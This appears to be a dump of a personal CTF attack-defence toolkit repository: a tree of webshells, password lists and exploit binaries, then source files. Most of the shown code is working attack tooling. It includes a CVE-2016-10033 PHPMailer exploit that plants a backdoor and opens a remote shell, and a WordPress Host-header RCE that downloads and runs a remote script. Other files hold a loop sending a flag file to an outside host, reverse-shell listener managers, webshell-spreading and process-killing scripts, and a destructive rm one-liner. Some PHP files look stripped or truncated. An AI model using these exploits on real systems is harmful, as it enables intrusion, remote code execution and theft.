├── README.md ├── awd ├── autoexp.py ├── bak.sh ├── echo_shell_base64_code.php ├── flask_submit_flask.py ├── fuck.py ├── fuck_pc.py ├── fuck_wp_1.py ├── grep_audit.md ├── include.sh ├── kill_php_fpm.sh ├── nodieshell.php ├── s1.php ├── s1.sh ├── s2.php ├── s3.php ├── s4.php ├── shell.py ├── shell_manager.py ├── shellmanager.py ├── showflageveryphp.php ├── submitFlag.py ├── wordpress_exp.py └── wordpress_phpmailer_exploit.sh ├── coder ├── bashfuck.py └── jjdecode.py ├── crypto ├── base64.c └── base64_encode_custom_table.c ├── dict ├── dicts.py ├── dir │ ├── 5.php.txt │ ├── 8.py.txt │ ├── bak.txt │ ├── bbscandir.txt │ ├── dic.txt │ ├── raft-large-files.txt │ └── web-dir-list.txt ├── domain │ └── domain_default.csv.txt ├── password │ ├── 10_million_password_list_top_1000.txt │ ├── 10k_most_common.txt │ ├── 10top1K.txt │ ├── 12306-14W-top100.txt │ ├── 3389爆破字典.txt │ ├── 3389爆破给力字典字典.txt │ ├── 500-worst-passwords.txt │ ├── Defaultpass.txt │ ├── NT密码.txt │ ├── adobe100.txt │ ├── best1050.txt │ ├── john.txt │ ├── password.txt │ ├── passwords.txt │ ├── phpbb.txt │ ├── rockyou-20.txt │ ├── simple-pass.txt │ ├── ssh_password.txt │ ├── tianya-top-1w.txt │ ├── top100password.txt │ ├── top10k.txt │ ├── top500.txt │ ├── twitter.txt │ ├── unix_passwords.txt │ ├── usernames.txt │ ├── weaksauce.txt │ ├── wordlist.txt │ ├── 字典.txt │ ├── 常用密码.txt │ ├── 渗透字典.txt │ └── 自己收集的密码.txt ├── ssrf │ ├── config.dic │ ├── deal_log.py │ ├── lfi-scanner.dic │ ├── log.dic │ ├── proc.dic │ └── ssrf.dic ├── web │ ├── ASP.txt │ ├── ASPX.txt │ ├── DIR.txt │ ├── JSP.txt │ ├── MDB.txt │ └── PHP.txt ├── webshell │ ├── shellpassword.txt │ ├── webshellPassword.txt │ ├── webshell_password_no_name.txt │ ├── webshll木马常用密码.txt │ ├── webshll木马常用密码1.txt │ └── 收藏的后门密码.txt └── wifipass │ └── wifi_password_top_100.txt ├── exp ├── les.pl └── win │ ├── GetPass.zip │ ├── GetPassword_x64.zip │ ├── ms16-032.exe │ ├── ms16-032_x64.exe │ ├── pr.exe │ └── pr_3389.exe ├── flowscript ├── flow.php ├── index.php ├── phpflow.php 
├── phpwaf.php └── waf.php ├── gen_xbin_avi.py ├── misc ├── Stegsolve.jar └── ZipCenOp.jar ├── other ├── py-server-cmd.txt └── test.py ├── proxy ├── Earthworm │ ├── Readme.txt │ ├── ew_for_Arm32 │ ├── ew_for_Linux32 │ ├── ew_for_MacOSX64 │ ├── ew_for_Win.exe │ ├── ew_for_linux64 │ └── ew_mipsel └── Termite │ ├── README.md │ ├── admin_MacOS_x64 │ ├── admin_linux_i586 │ ├── admin_linux_i686 │ ├── admin_linux_x86_64 │ ├── admin_win32.exe │ ├── agent_MacOS_x64 │ ├── agent_linux_armv4l │ ├── agent_linux_armv5l │ ├── agent_linux_i586 │ ├── agent_linux_i686 │ ├── agent_linux_m68k │ ├── agent_linux_mips │ ├── agent_linux_mipsel │ ├── agent_linux_powerpc │ ├── agent_linux_powerpc-440fp │ ├── agent_linux_sh4 │ ├── agent_linux_sparc │ ├── agent_linux_x86_64 │ └── agent_win32.exe ├── scripts ├── aes_decrypt.py ├── hashid.py ├── htpasswd.sh ├── iconv_gbk_to_utf8.sh ├── include_waf.sh ├── killphp.sh ├── python_tty.sh ├── reset_mysql_root_password.sh ├── rtcp.py ├── scanwebshell.py ├── shell_53_udp.py ├── socks5.py ├── xssget.php └── xxtea_decrypt.c ├── sh ├── clear_log.sh ├── echo.sh ├── ftpd.sh └── install_waf.sh ├── socksserver.py ├── tools ├── InsightScan.py ├── PaddingOracleAttack.py ├── Rescan.py ├── bash.py ├── cipher_identify.py ├── drcom │ ├── Decipher.class │ ├── Decipher.java │ └── Decipher.py ├── elasticsearch.py ├── ftp.py ├── google.py ├── iis_shortname_Scan.py ├── ip.py ├── jinzhi.py ├── md5_collision_bin │ ├── exp.py │ ├── message1.bin │ └── message2.bin ├── mongdb.py ├── php.py ├── php_images_webshell_jpg.php ├── php_mt_seed-3.2.tar.gz ├── png_create.php ├── png_test.py ├── portscan.py ├── portscan2.py ├── portscan3.py ├── portscan4.py ├── post_upload.py ├── privdns.py ├── random_string.py ├── rebuild_png.py ├── redis.py ├── redis_ssh.sh ├── reverse-shell.pl ├── rexp.py ├── rip-hg.pl ├── rip-svn.pl ├── rtcp.py ├── runmd5.py ├── shell_53_udp.py ├── socket_shell.py ├── socket_shell_bash_py.sh ├── socks5.py ├── sqlin.py ├── ssltest.py ├── ssrf.py ├── tarfile.py ├── 
urllibreq.py └── vi_vim_scan_and_download.py ├── webshell ├── asp │ ├── ice.asp │ └── wumi.asp ├── c │ └── cmd.c ├── jsp │ ├── CmdServlet.class │ ├── CmdServlet.java │ ├── ListServlet.class │ ├── ListServlet.java │ ├── UpServlet.class │ ├── UpServlet.java │ ├── cmd.jsp │ ├── sll.jsp │ └── up.jsp ├── php │ ├── cmd.php │ ├── list.php │ ├── supershell.php │ └── up.php ├── pl-cgi │ ├── cmd.pl │ ├── list.pl │ └── up.pl ├── servlet │ ├── CmdServlet.java │ ├── ListServlet.java │ └── UpServlet.java └── sh │ ├── cmd.sh │ ├── list.sh │ └── up.sh └── wrapper ├── Makefile ├── hook.c ├── wrapper_pipe.c └── wrapper_socket.c /README.md: -------------------------------------------------------------------------------- 1 | # vFuckingTools 2 | 3 | A CTFer tools bag by myself 4 | 5 | ## 难受 6 | 7 | 整理的时候执行了 8 | 9 | `find . -type f | grep ".\!*" | xargs rm` 10 | 11 | 于是就悲剧了,,,, -------------------------------------------------------------------------------- /awd/bak.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z $1 ];then 3 | echo './bak.sh webroot' 4 | else 5 | echo "WWWROOT : $1" 6 | tar -zcvf /tmp/webbak_`basename $1`_`date|md5 -q`.tar.gz $1 7 | echo "Backup : /tmp/webbak_`basename $1`_`date|md5 -q`.tar.gz" 8 | fi 9 | -------------------------------------------------------------------------------- /awd/echo_shell_base64_code.php: -------------------------------------------------------------------------------- 1 | ', 54 | 'dosubmit': '1', 55 | } 56 | rep = requests.post(u, data=data) 57 | print(rep.content) 58 | shell = '' 59 | re_result = re.findall(r'<img src=(.*)>', rep.content) 60 | if len(re_result): 61 | shell = re_result[0] 62 | return shell 63 | 64 | 65 | def submit(flag, ip): 66 | headers = { 67 | "Cookie": "SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2" 68 | } 69 | data = { 70 | "melee_flag": flag, 71 | "melee_ip": 
ip 72 | } 73 | res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5) 74 | if res.status_code == 200: 75 | # print res.content 76 | html = res.content 77 | print html[-200:] 78 | if '您已提交过当前IP和FLAG' in html: 79 | print '您已提交过当前IP和FLAG' 80 | elif '恭喜您答对了' in html: 81 | print '恭喜您答对了' 82 | 83 | if __name__ == '__main__': 84 | # while True: 85 | for shell in SHELLS: 86 | print shell 87 | try: 88 | flag = poc_eval_backdoor_getflag_1(shell) 89 | if flag: 90 | print flag 91 | flag = flag.strip().replace('\r', '').replace('\n', '') 92 | print shell[7:21], flag 93 | submit(flag, shell[7:21]) 94 | time.sleep(15) 95 | except Exception, e: 96 | print e 97 | pass 98 | print 'Waiting...' 99 | # time.sleep(60 * 10) 100 | -------------------------------------------------------------------------------- /awd/fuck_wp_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | import requests 4 | import re 5 | import time 6 | 7 | req = None 8 | 9 | TOKEN = "" 10 | SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php" 11 | SUBMIT_U = "" 12 | SUBMIT_P = "" 13 | 14 | URLS = ['172.20.101.101', 15 | '172.20.102.101', 16 | '172.20.103.101', 17 | # '172.20.104.101', 18 | '172.20.105.101', 19 | '172.20.106.101', 20 | '172.20.107.101', 21 | '172.20.108.101' 22 | ] 23 | URLS2 = ['172.20.101.103', 24 | '172.20.102.103', 25 | '172.20.103.103', 26 | # '172.20.104.103', 27 | '172.20.105.103', 28 | '172.20.106.103', 29 | '172.20.107.103', 30 | '172.20.108.103' 31 | ] 32 | 33 | 34 | def poc_eval_backdoor_getflag_1(shellurl, p, code): 35 | data = { 36 | p: code 37 | } 38 | try: 39 | res = requests.post(shellurl, data=data, timeout=5) 40 | if res.status_code == 200: 41 | return res.content 42 | except Exception, e: 43 | print e 44 | 45 | 46 | def poc_phpcms_reg_shell(url): 47 | u = 'http://{}/phpcms/index.php?m=member&c=index&a=register&siteid=1'.format( 48 | url) 49 | data = { 50 | 'siteid': '1', 51 | 
'modelid': '1', 52 | 'username': 'test', 53 | 'password': 'testxx', 54 | 'email': 'test@test.com', 55 | 'info[content]': '', 56 | 'dosubmit': '1', 57 | } 58 | rep = requests.post(u, data=data) 59 | print(rep.content) 60 | shell = '' 61 | re_result = re.findall(r'<img src=(.*)>', rep.content) 62 | if len(re_result): 63 | shell = re_result[0] 64 | print url, shell 65 | return shell 66 | 67 | 68 | def submit(flag, ip): 69 | headers = { 70 | "Cookie": "SSCSum=14; zlms-sid=uh8kbtd9jrki9ch4jo7qfnpnt0; webcs_test_cookie=lms_cookie_checker; lms_login_name=HZ9; PHPSESSID=jq11tlbp5kuvtk49h94r6b1ap2" 71 | } 72 | data = { 73 | "melee_flag": flag, 74 | "melee_ip": ip 75 | } 76 | res = requests.post(SUBMIT_URL, data=data, headers=headers, timeout=5) 77 | if res.status_code == 200: 78 | # print res.content 79 | html = res.content 80 | print html[-200:] 81 | if '您已提交过当前IP和FLAG' in html: 82 | print '您已提交过当前IP和FLAG' 83 | elif '恭喜您答对了' in html: 84 | print '恭喜您答对了' 85 | 86 | 87 | def fuck_1(): 88 | req = requests.session() 89 | for ip in URLS: 90 | try: 91 | su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format( 92 | ip) 93 | flag = poc_eval_backdoor_getflag_1( 94 | su, "525", "echo file_get_contents('/flag.txt');") 95 | if flag: 96 | flag = flag.strip().replace('\r', '').replace('\n', '') 97 | print ip, flag 98 | submit(flag, ip) 99 | time.sleep(15) 100 | except Exception, e: 101 | print e 102 | 103 | 104 | def test(): 105 | for ip in URLS: 106 | # su = 'http://{}/wp-content/plugins/mailpress/uninstall.php'.format( 107 | # ip) 108 | custom_shell_add_shell(ip) 109 | # flag = poc_eval_backdoor_getflag_1( 110 | # su, "525", "echo file_get_contents('/flag.txt');") 111 | print ip 112 | 113 | 114 | if __name__ == '__main__': 115 | fuck_1() 116 | # while True: 117 | # fuck_1() 118 | # print 'Waiting...' 
119 | # time.sleep(60 * 20) 120 | # poc_phpcms_reg_shell('172.20.102.103') 121 | # for ip in URLS2: 122 | # poc_phpcms_reg_shell(ip) 123 | -------------------------------------------------------------------------------- /awd/grep_audit.md: -------------------------------------------------------------------------------- 1 | grep -i -r "\$_GET" /path 2 | grep -i -r "\$_GET" |grep eval 3 | grep -i -r "\$_GET" |grep assert 4 | grep -i -r "\$_GET" |grep system 5 | grep -i -r "\$_GET" |grep call_user 6 | grep -i -r "\$_GET" |grep eval_r 7 | grep -i -r "\$_GET" |grep preg_replace 8 | grep -i -r "\$_GET" |grep exec -------------------------------------------------------------------------------- /awd/include.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for file in $(find . -name '*.php');do 3 | sed -i "2c 4 | require_once('/usr/share/nginx/html/WordPress/phpwaf.php');" $file; 5 | done 6 | -------------------------------------------------------------------------------- /awd/kill_php_fpm.sh: -------------------------------------------------------------------------------- 1 | ps -ed | grep 'php-fpm' | awk '{print $1}' | xargs kill -9 2 | 3 | 4 | ps -ed | grep 'sshd' | awk '{print $1}' | xargs kill -9 5 | 6 | 7 | -------------------------------------------------------------------------------- /awd/nodieshell.php: -------------------------------------------------------------------------------- 1 | /dev/null"); 8 | } -------------------------------------------------------------------------------- /awd/s1.php: -------------------------------------------------------------------------------- 1 | \r\n'.file_get_contents($afile)); 11 | } 12 | } 13 | getfiles('/var/www/html'); 14 | 15 | ?> -------------------------------------------------------------------------------- /awd/s1.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sh 2 | while true 3 | do 4 | curl -d "flag=${`cat 
flag`}" "http://{IP}/g.php" 5 | sleep 1*60*10 6 | done -------------------------------------------------------------------------------- /awd/s2.php: -------------------------------------------------------------------------------- 1 | '); 6 | function getfiles($path){ 7 | foreach(glob($path) as $afile){ 8 | if(is_dir($afile)){ 9 | getfiles($afile.'/*.php'); 10 | }else{ 11 | file_put_contents($afile,''.file_get_contents($afile), FILE_APPEND); 12 | } 13 | } 14 | } 15 | while(1){ 16 | getfiles($_SERVER['DOCUMENT_ROOT']); 17 | } 18 | ?> -------------------------------------------------------------------------------- /awd/s3.php: -------------------------------------------------------------------------------- 1 | '); 6 | function getfiles($path){ 7 | foreach(glob($path) as $afile){ 8 | if(is_dir($afile)){ 9 | getfiles($afile.'/*.php'); 10 | }else{ 11 | file_put_contents($afile,''); 12 | } 13 | } 14 | } 15 | while(1){ 16 | getfiles($_SERVER['DOCUMENT_ROOT']); 17 | } 18 | ?> -------------------------------------------------------------------------------- /awd/s4.php: -------------------------------------------------------------------------------- 1 | '); 6 | $bash =<< /dev/null'); 16 | 17 | while(1){ 18 | getfiles($_SERVER['DOCUMENT_ROOT']); 19 | } 20 | ?> -------------------------------------------------------------------------------- /awd/shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import requests 3 | import random 4 | 5 | ip_pass = {} 6 | shell_pass = [] 7 | 8 | shell_address = '/WordPress/shell.php' 9 | 10 | ips = ['40.10.10.57', 11 | '40.10.10.26', 12 | '40.10.10.11', 13 | '40.10.10.62', 14 | '40.10.10.24', 15 | '40.10.10.59', 16 | '40.10.10.47', 17 | '40.10.10.42', 18 | '40.10.10.15', 19 | ] 20 | 21 | 22 | def get_shell(file): 23 | return open(file).read() 24 | 25 | 26 | def random_str(randomlength=6): 27 | str = '' 28 | chars = 
'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789' 29 | length = len(chars) - 1 30 | for i in range(randomlength): 31 | str += chars[random.randint(0, length)] 32 | return str 33 | 34 | 35 | def fuck(ip, password): 36 | global filepath 37 | # payload = % password 38 | payload = get_shell('s4.php') 39 | payload = payload.replace('passwordpassword', password).replace( 40 | '', '').replace('filepathfilepath', filepath) 41 | try: 42 | ip_pass[ip] = password 43 | data = {'1': payload} 44 | r = requests.post('http://' + ip + shell_address, data=data, timeout=3) 45 | if r.status_code == '200': 46 | print(ip + 'shell exist') 47 | ip_pass[ip] = password 48 | except requests.exceptions.ReadTimeout, e: 49 | print('except : ' + e) 50 | pass 51 | 52 | if __name__ == '__main__': 53 | filepath = '' 54 | for ip in ips: 55 | password = random_str() 56 | fuck(ip, password) 57 | -------------------------------------------------------------------------------- /awd/shell_manager.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import SocketServer 5 | import threading 6 | import socket 7 | 8 | HOST = '0.0.0.0' 9 | PORT = 9999 10 | BUFSIZE = 1024 * 4 11 | 12 | CLIENTS = [] 13 | 14 | 15 | class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): 16 | 17 | def setup(self): 18 | # print(self.client_address) 19 | CLIENTS.append({self.client_address[0]: self.request}) 20 | 21 | def handle(self): 22 | data = self.request.recv(BUFSIZE) 23 | cur_thread = threading.current_thread() 24 | # response = "{}: {}".format(cur_thread.name, data) 25 | print(data) 26 | print("\n") 27 | # self.request.sendall(response) 28 | 29 | def finish(self): 30 | print("finish\n") 31 | # print(self.client_address[0] + "\n") 32 | 33 | 34 | class MyThreadingTCPServer(SocketServer.ThreadingTCPServer): 35 | 36 | def __init__(self, server_address, RequestHandlerClass): 37 | 
SocketServer.ThreadingTCPServer.__init__( 38 | self, server_address, RequestHandlerClass) 39 | self.request_queue_size = 200 40 | self.socket_type = socket.SOCK_STREAM 41 | 42 | 43 | if __name__ == '__main__': 44 | server = MyThreadingTCPServer( 45 | (HOST, PORT), ThreadedTCPRequestHandler) 46 | try: 47 | st = threading.Thread(target=server.serve_forever) 48 | st.daemon = True 49 | st.start() 50 | print "Server loop running in thread:", st.name 51 | cmd = raw_input("cmd > ") 52 | while cmd: 53 | if cmd == 'ls': 54 | print("ls\n") 55 | for i in range(1, len(CLIENTS) + 1): 56 | print("%d\t%s" % (i, CLIENTS[i - 1])) 57 | elif cmd[:4] == 'fuck': 58 | cid = int(cmd[4:]) 59 | if not cid: 60 | print("fuck [num]") 61 | if CLIENTS[cid - 1]: 62 | print(CLIENTS[cid - 1]) 63 | print("client %s >\n" % CLIENTS[cid - 1][1]) 64 | client = CLIENTS[cid - 1][CLIENTS[cid - 1].keys()[0]] 65 | ccmd = raw_input("client > ") 66 | while ccmd: 67 | if ccmd == "vquit": 68 | break 69 | client.sendall(ccmd) 70 | ccmd = raw_input("client > ") 71 | elif cmd == 'exit': 72 | server.shutdown() 73 | server.server_close() 74 | break 75 | elif cmd[:4] == 'eval': 76 | eval(cmd[4:]) 77 | else: 78 | print("Error cmd : %s" % cmd) 79 | cmd = raw_input("cmd > ") 80 | except KeyboardInterrupt: 81 | print("^C") 82 | server.shutdown() 83 | server.server_close() 84 | except Exception as e: 85 | print(e) 86 | # try: 87 | # cmd = raw_input("cmd > ") 88 | # while cmd: 89 | # if cmd == 'ls': 90 | # print("ls\n") 91 | # for i in CLIENTS: 92 | # print("\t%s" % i) 93 | # elif cmd == 'exit': 94 | # print("exit\n") 95 | # STOP = True 96 | # sys.exit(0) 97 | # else: 98 | # print("Error cmd : %s" % cmd) 99 | # cmd = raw_input("cmd > ") 100 | # except KeyboardInterrupt: 101 | # sys.exit(0) 102 | -------------------------------------------------------------------------------- /awd/shellmanager.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: 
utf-8 -*- 3 | 4 | import socket 5 | import sys 6 | import threading 7 | import time 8 | import random 9 | 10 | HOST = '0.0.0.0' 11 | PORT = 23333 12 | BUFSIZE = 1024 * 8 13 | 14 | VER = sys.version_info.major 15 | 16 | if VER == 3: 17 | raw_input = input 18 | 19 | 20 | class Reader(threading.Thread): 21 | 22 | def __init__(self, client): 23 | threading.Thread.__init__(self) 24 | self.client = client 25 | self.stop = False 26 | 27 | def run(self): 28 | while not self.stop: 29 | data = self.client.recv(BUFSIZE) 30 | if data: 31 | print(data) 32 | time.sleep(1) 33 | continue 34 | 35 | def cmd(self, cmd): 36 | self.client.sendall(cmd) 37 | 38 | def stop(self): 39 | self.stop = True 40 | 41 | x = { 42 | "127.0.0.1": { 43 | "port": "c" 44 | } 45 | } 46 | 47 | 48 | class Listener(threading.Thread): 49 | 50 | def __init__(self, port): 51 | threading.Thread.__init__(self) 52 | self.clients = {} 53 | self.stop = False 54 | self.port = port 55 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 56 | self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 57 | self.sock.bind((HOST, port)) 58 | self.sock.listen(1) 59 | 60 | def run(self): 61 | print("listener started %s\n" % self.port) 62 | while not self.stop: 63 | client, cltadd = self.sock.accept() 64 | t = Reader(client) 65 | c_host = str(client.getpeername()[0]) 66 | c_port = client.getpeername()[1] 67 | if c_host not in self.clients: 68 | self.clients.update({c_host: {c_port: t}}) 69 | else: 70 | self.clients[c_host].update({c_port: t}) 71 | t.start() 72 | 73 | def stop(self): 74 | for i in self.clients: 75 | self.clients[i][1].stop() 76 | self.stop = True 77 | 78 | 79 | def cmd(lst): 80 | cmd = raw_input("cmd > ") 81 | while True: 82 | try: 83 | if cmd == 'ls': 84 | for k_host in lst.clients: 85 | print(">> %s\n" % (k_host)) 86 | for k_port in lst.clients[k_host]: 87 | print(">>>> %s -> %s\n" % 88 | (k_port, lst.clients[k_host][k_port])) 89 | elif cmd[:4] == 'fuck': 90 | cc = cmd[5:].strip() 91 | cc = 
cc.split(":") 92 | host = cc[0] 93 | port = cc[1] 94 | if host and lst.clients[host]: 95 | client = lst.clients[host][port] 96 | pt = "client %s:%d >>" % (host, port) 97 | ccmd = raw_input(pt) 98 | while ccmd: 99 | if ccmd == "vquit" or ccmd == "vq": 100 | break 101 | client.sendall(ccmd + "\n") 102 | ccmd = "" 103 | ccmd = raw_input(pt) 104 | elif cmd == 'exit': 105 | lst.stop() 106 | break 107 | elif cmd[:4] == 'eval': 108 | eval(cmd[4:]) 109 | else: 110 | print("cmd :\n\tls\n\tfuck [n]\n\texit") 111 | # TODO test-live 112 | cmd = raw_input("cmd > ") 113 | except Exception as e: 114 | print(e) 115 | 116 | if __name__ == '__main__': 117 | lst = Listener(PORT) 118 | lst.daemon = True 119 | lst.start() 120 | cmd(lst) 121 | -------------------------------------------------------------------------------- /awd/showflageveryphp.php: -------------------------------------------------------------------------------- 1 | >>".file_get_content("/pathflagpathflag")."<<<";?>',FILE_APPEND); 11 | } 12 | } 13 | getfiles('/var/www/html'); 14 | ?> -------------------------------------------------------------------------------- /awd/submitFlag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Date : 2018-08-10 13:04:42 4 | # @Author : Virink (virink@outlook.com) 5 | # @Link : https://www.virzz.com 6 | # @Version : $Id$ 7 | 8 | import os 9 | import requests as req 10 | 11 | URL = "" 12 | 13 | 14 | def submit(flag): 15 | data = { 16 | "flag": flag 17 | } 18 | res = req.post(URL, data) 19 | if res.status_code == 200: 20 | return True 21 | else: 22 | return False 23 | 24 | if __name__ == '__main__': 25 | flag = "flag{test]" 26 | res = submit(flag) 27 | print(res) 28 | -------------------------------------------------------------------------------- /awd/wordpress_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import 
requests 3 | import sys 4 | 5 | # wordpress's url 6 | target = 'http://127.0.0.1' if not sys.argv[1] else sys.argv[1] 7 | # Put your command in a website, and use the website's url 8 | # don't contains "http://", must be all lowercase 9 | shell_url = 'example.com/1.txt' if not sys.argv[2] else sys.argv[2] 10 | # an exists user 11 | user = 'admin' 12 | 13 | def generate_command(command): 14 | command = '${run{%s}}' % command 15 | command = command.replace('/', '${substr{0}{1}{$spool_directory}}') 16 | command = command.replace(' ', '${substr{10}{1}{$tod_log}}') 17 | return 'target(any -froot@localhost -be %s null)' % command 18 | 19 | 20 | data = { 21 | 'user_login': user, 22 | 'redirect_to': '', 23 | 'wp-submit': 'Get New Password' 24 | } 25 | headers = { 26 | 'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url), 27 | 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' 28 | } 29 | proxies = { 30 | 'http': 'http://127.0.0.1:8080' 31 | } 32 | target += '/wp-login.php?action=lostpassword' 33 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False) 34 | headers['Host'] = generate_command('/bin/bash /tmp/rce') 35 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False) -------------------------------------------------------------------------------- /awd/wordpress_phpmailer_exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2016-10033 exploit by opsxcq 3 | # https://github.com/opsxcq/exploit-CVE-2016-10033 4 | 5 | echo '[+] CVE-2016-10033 exploit by opsxcq' 6 | 7 | if [ -z "$1" ] 8 | then 9 | echo '[-] Please inform an host as parameter' 10 | exit -1 11 | fi 12 | 13 | if [ $(uname) == 'Darwin' ] 14 | then 15 | decoder='base64 -D' 16 | elif [ $(uname) == 'Linux' ] 17 | then 18 | decoder='base64 -d' 19 | else 20 | echo '[-] Your platform isnt supported: '$(uname) 21 | exit -1 22 | fi 
23 | 24 | 25 | host=$1 26 | 27 | echo '[+] Exploiting '$host 28 | 29 | curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\n\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php' 30 | 31 | 32 | echo '[+] Checking if the backdoor was created on target system' 33 | code=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n' "http://$host/backdoor.php") 34 | 35 | if [ "$code" != "200" ] 36 | then 37 | echo '[-] Target cant be exploited' 38 | exit -1 39 | else 40 | echo '[+] Backdoor.php found on remote system' 41 | fi 42 | 43 | cmd='whoami' 44 | while [ "$cmd" != 'exit' ] 45 | do 46 | echo '[+] Running '$cmd 47 | if ! 
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder 48 | then 49 | echo '[-] Connection problens' 50 | exit -1 51 | fi 52 | echo 53 | read -p 'RemoteShell> ' cmd 54 | done 55 | echo '[+] Exiting' 56 | -------------------------------------------------------------------------------- /coder/bashfuck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys 5 | import os 6 | from pwn import * 7 | import argparse 8 | 9 | """ 10 | 0xddaa 11 | https://github.com/0xddaa/bashfuck 12 | encode a bash command with charset $, (, ), #, !, {, }, <, \, '. 13 | """ 14 | 15 | n = dict() 16 | n[0] = '$#' 17 | n[1] = '${##}' 18 | n[2] = '$(({n1}<<{n1}))'.format(n1=n[1]) 19 | n[3] = '$(({n2}#{n1}{n1}))'.format(n2=n[2], n1=n[1]) 20 | n[4] = '$(({n2}#{n1}{n0}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0]) 21 | n[5] = '$(({n2}#{n1}{n0}{n1}))'.format(n2=n[2], n1=n[1], n0=n[0]) 22 | n[6] = '$(({n2}#{n1}{n1}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0]) 23 | n[7] = '$(({n2}#{n1}{n1}{n1}))'.format(n2=n[2], n1=n[1]) 24 | 25 | 26 | def split(cmd): 27 | argv = [] 28 | token = '' 29 | quote = False 30 | for c in cmd: 31 | if c == ' ' and not quote: 32 | argv.append(token) 33 | token = '' 34 | elif c == '\'': 35 | quote = not quote 36 | else: 37 | token += c 38 | argv.append(token) 39 | return argv 40 | 41 | 42 | def str_to_oct(cmd): 43 | s = "$\\'" 44 | for _ in cmd: 45 | o = ('%s' % (oct(ord(_)).lstrip('0'))).rjust(3, '0') 46 | e = '\\\\' + ''.join(n[int(d)] for d in o) 47 | s += e 48 | s += "\\'" 49 | return s 50 | 51 | 52 | def arg_to_cmd(arg): 53 | cmd = '{' 54 | cmd += ','.join(str_to_oct(_) for _ in arg) 55 | cmd += ',}' 56 | return cmd 57 | 58 | 59 | def encode(cmd): 60 | log.info('cmd: `{}`'.format(cmd)) 61 | bash = '${!#}' 62 | cmd = "bash -c '{}'".format(cmd) 63 | exp = "%s<<<%s" % (bash, 
arg_to_cmd(split(cmd))) 64 | log.info('result ({} byte): {}'.format(len(exp), exp)) 65 | return exp 66 | 67 | 68 | def execute(bashfuck): 69 | with context.local(log_level='ERROR'): 70 | r = process('/bin/bash') 71 | r.sendline(bashfuck) 72 | r.sendline('echo GGGGGGGG; exit') 73 | log.info(r.recvuntil('GGGGGGGG', drop=True).strip()) 74 | with context.local(log_level='ERROR'): 75 | r.close() 76 | 77 | 78 | if __name__ == '__main__': 79 | parser = argparse.ArgumentParser(prog=sys.argv[0], 80 | description="encode a bash command with charset $,(,),#,!,{,},<,\\,'") 81 | parser.add_argument('cmd') 82 | parser.add_argument('-t', '--test', action='store_true', 83 | help='test bashfuck and output result') 84 | args = parser.parse_args() 85 | 86 | if args.test: 87 | execute(encode(args.cmd)) 88 | else: 89 | encode(args.cmd) 90 | -------------------------------------------------------------------------------- /crypto/base64_encode_custom_table.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // const char * base64Table = "BADCFEHGIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 5 | 6 | const char * base64Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 7 | 8 | char * base64_encode(const unsigned char * bindata, char * base64, int binlength) 9 | { 10 | int i, j; 11 | unsigned char current; 12 | 13 | for (i = 0, j = 0; i < binlength; i += 3) 14 | { 15 | current = (bindata[i] >> 2); 16 | current &= (unsigned char)0x3F; 17 | base64[j++] = base64Table[(int)current]; 18 | 19 | current = ((unsigned char)(bindata[i] << 4)) & ((unsigned char)0x30); 20 | if (i + 1 >= binlength) 21 | { 22 | base64[j++] = base64Table[(int)current]; 23 | base64[j++] = '='; 24 | base64[j++] = '='; 25 | break; 26 | } 27 | current |= ((unsigned char)(bindata[i + 1] >> 4)) & ((unsigned 